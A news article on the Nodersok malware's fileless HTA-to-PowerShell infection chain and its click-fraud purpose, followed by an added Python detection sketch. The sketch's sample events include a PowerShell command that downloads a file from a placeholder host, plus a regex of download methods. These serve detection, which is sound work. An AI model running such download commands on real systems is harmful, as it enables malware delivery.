
Image credit: sasha85ru via Getty Images

Malware uses web apps to turn PCs into conduits for attacks

Thousands of systems have been targeted.

It's not just botnets that can hijack PCs for nefarious ends. Microsoft and Cisco's Talos researchers have identified a new malware strain, Nodersok (or Divergent), that uses web apps to turn systems into proxies for malicious internet traffic. The attack gets victims to run an HTA (HTML application) file through a rogue ad or download, launching a complex sequence of events. JavaScript in the HTA downloads a separate JavaScript file, and that in turn runs a PowerShell command that downloads and runs a whole host of tools, including ones that disable Windows Defender, ask for more control, capture data packets and create the intended proxy.

Crucially, the infection relies on legitimate programs to accomplish its task, whether they're built into Windows or downloaded from third parties. There are no malware programs copied to storage. The approach makes it harder for security teams to research the code and devise countermeasures.

It's not certain who's behind Nodersok. It appears to be meant for everyday criminals rather than hostile countries, however. Cisco believed that it was "primarily designed" for click fraud, or the practice of automatically generating ad clicks to boost revenue from websites. Most targets are typical consumers in Europe and the US rather than corporate or government users.

Both Microsoft and Cisco are keen to tout the ability of their enterprise-grade defense systems to thwart the malware. Most people don't have access to those resources, though, and conventional signature-based antivirus software has a much harder time. Nodersok has targeted "thousands of machines" in recent weeks, according to Microsoft, and that might not let up in the near future.
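Because the chain described above runs only legitimate programs, behavior is a better signal than file signatures. The Python sketch below is an added example, not code from Microsoft, Talos or the original article: it flags any PowerShell process that has an HTA host in its ancestry. It assumes HTA files are run by mshta.exe and that process-creation events (PID, parent PID, image, command line) are available; every event, path and URL in it is constructed.

```python
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation events (Sysmon Event ID 1 style fields).
# PIDs, paths and the URL are placeholders, not Nodersok indicators.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Users\u\Downloads\update.hta"'},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\u\AppData\Local\Temp\stage2.js"'},
    {"pid": 220, "ppid": 210, "image": PS,
     "cmd": r'powershell.exe -Command "Invoke-WebRequest -Uri '
            r'http://example.invalid/tools.zip -OutFile C:\Temp\t.zip"'},
    # Benign: an admin script started from the desktop shell.
    {"pid": 300, "ppid": 100, "image": PS, "cmd": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

# Generic download indicators in a PowerShell command line (assumed list).
DOWNLOAD = re.compile(r"invoke-webrequest|net\.webclient|downloadstring|downloadfile", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def ancestors(pid, by_pid):
    """Yield ancestor events of pid, nearest first; stops on unknown or repeated PIDs."""
    seen, cur = set(), by_pid.get(pid)
    while cur and cur["ppid"] in by_pid and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid[cur["ppid"]]
        yield cur

def detect(events):
    """Return one alert per PowerShell process descended from mshta.exe."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        chain = [basename(a["image"]) for a in ancestors(e["pid"], by_pid)]
        if "mshta.exe" in chain:
            alerts.append({"pid": e["pid"],
                           "chain": chain[::-1] + ["powershell.exe"],
                           "downloads": bool(DOWNLOAD.search(e["cmd"]))})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

On real telemetry, key the ancestry on a per-process unique identifier rather than the PID, since Windows reuses PIDs.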

Via: ZDNet
Source: Microsoft, Talos